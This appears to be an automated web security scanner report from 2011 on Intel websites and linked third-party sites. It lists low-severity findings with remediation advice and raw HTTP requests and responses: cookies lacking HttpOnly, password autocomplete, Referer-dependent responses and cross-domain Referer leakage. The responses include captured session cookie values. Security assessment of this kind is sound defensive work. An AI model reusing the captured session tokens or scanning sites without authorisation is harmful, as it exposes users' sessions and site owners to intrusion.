HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:18 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Last-Modified: Mon, 21 Jun 2010 23:36:27 GMT Accept-Ranges: bytes Content-Length: 118333 X-Served-By: www144.flickr.mud.yahoo.com Cache-Control: private Connection: close Content-Type: application/x-shockwave-flash
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /photos/intelphotos HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:17 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com X-Served-By: www40.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65286
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /channelintel HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:31 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/das_captcha?next=/channelintel Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /view_play_list HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:33 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/?ytsession=EDIPaPJ1NkCikKaHvniF7Tiz6vDWTKiQ2BjrzENMdu4p9NPioHcNGMGtxIJnyKsQ9R2I0ZskMRuPWAvsogbKJyMWdeu6E20vtaVqZVDrw7r_emQa58TecjXkS424salJlpG18NSZg1fKaRHRopstmT9udEtftazAtuYX5ENoz6ASKAmuR9gwuzmdsPgCvpW_exCnDvIgodEvClzCDA0RQe5zB9i1kM0ugB-9Pp7XUtYHjj1xXNi4E_xDKRXczWIf1KogmWn98Y7QdIm3PseAUQ Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:33 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT Set-Cookie: GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=Uq4q39XF8n9pzVE7ljERwFoh2ir4kQlnCvFfi3V86wjgkCxlmb9pqK47ZeV_AeK8Gwi_mmTUJO6EE5ehEUFOiUOwnmac1YQ8wbPkBQA-K857ZGPA4gaFu591L_HP6SJNE6Hh7IwMMjOi6R-9ReRkQSMrxmsRjs1L7joKvo52BVGDZGuL-TQEmNaQhm9iYfu8CAZG9xN5aPSB4nCO3yweeBbU07vD6c26v_7TT7mnV8W0gTeCsoe37SpcCsl47vCTo9g2wt0u8Ri5yPMrqyNc2B7GXI0DyN3Ayh3nXEwYcOfb9eUQHoN_bQ Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://digg.com/submit?url=
The form contains the following password field with autocomplete enabled:
password
Request
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/?iid=subhdr+devctr_sw HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en-us X-Pingback: http://software.intel.com/en-us/services/comment/pingback/ Date: Sat, 05 Feb 2011 23:21:40 GMT Content-Length: 20519 Connection: close Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com Set-Cookie: loginpt=0
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /EricMMartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:34 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086 ETag: "b0c81407bf609b9b1cf953048b1105ab" Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT X-Runtime: 0.00598 Content-Type: text/html; charset=utf-8 Content-Length: 58433 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /intelnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:36 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534 ETag: "5ef92426ebdf2d0090dae9af07327303" Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT X-Runtime: 0.00428 Content-Type: text/html; charset=utf-8 Content-Length: 50405 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The form contains the following password field with autocomplete enabled:
pass
Request
GET /widgets/fan.php HTTP/1.1 Host: www.connect.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:13 GMT Content-Length: 10636
The page contains a form with the following action URL:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field with autocomplete enabled:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:13 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33772
The form contains the following password field with autocomplete enabled:
pass
Request
GET /Intel HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:09 GMT Content-Length: 43972
The form contains the following password field with autocomplete enabled:
pass
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:08 GMT Content-Length: 10821
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /csr/16 HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:16 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=9428 t=1296947776690668 Vary: Accept-Encoding Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /csr/assets_c/2011/02/DSC07688-thumb-300x225-thumb-200x150.jpg& HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:13 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=6095 t=1296947773852801 Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /csr/assets_c/2011/02/DSC07688-thumb-300x225.php& HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5172 t=1296947772818376 Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /csr/tag/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=8655 t=1296947772664051 Vary: Accept-Encoding Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /healthcare/healthcare/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:22 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=6438 t=1296947782674402 Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /healthcare/tag/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:23 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5364 t=1296947783001557 Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /jobs/tag/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=6673 t=1296947779756026 Connection: close Content-Length: 29111
The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
cmd
submit
encrypted
Request
GET / HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:47 GMT Date: Sat, 05 Feb 2011 23:17:47 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
cmd
submit
encrypted
Request
GET /2007/10/jquerylocalscroll-10.html HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:48 GMT Date: Sat, 05 Feb 2011 23:17:48 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
cmd
submit
encrypted
Request
GET /2007/10/jqueryscrollto.html HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:47 GMT Date: Sat, 05 Feb 2011 23:17:47 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
email
feed_btn
url
title
loc
Request
GET /gapingvoid-art-gallery/ HTTP/1.1 Host: scoop.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.3 X-Pingback: http://scoop.intel.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39944
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /?iid=gg_prod-en_US+ark HTTP/1.1 Host: ark.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P: C1 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=76390 Date: Sat, 05 Feb 2011 23:21:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 174001
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
GET /community/tech?iid=gg_support-EN_01+home_community_tech HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response contains the following links to other domains:
http://www.google-analytics.com/urchin.js
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /community/tech/desktop?iid=gg_support-EN_01+home_desktop_bds_forum HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /index.jspa?iid=hdr+communities HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title>
<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics ...[SNIP]... <meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">
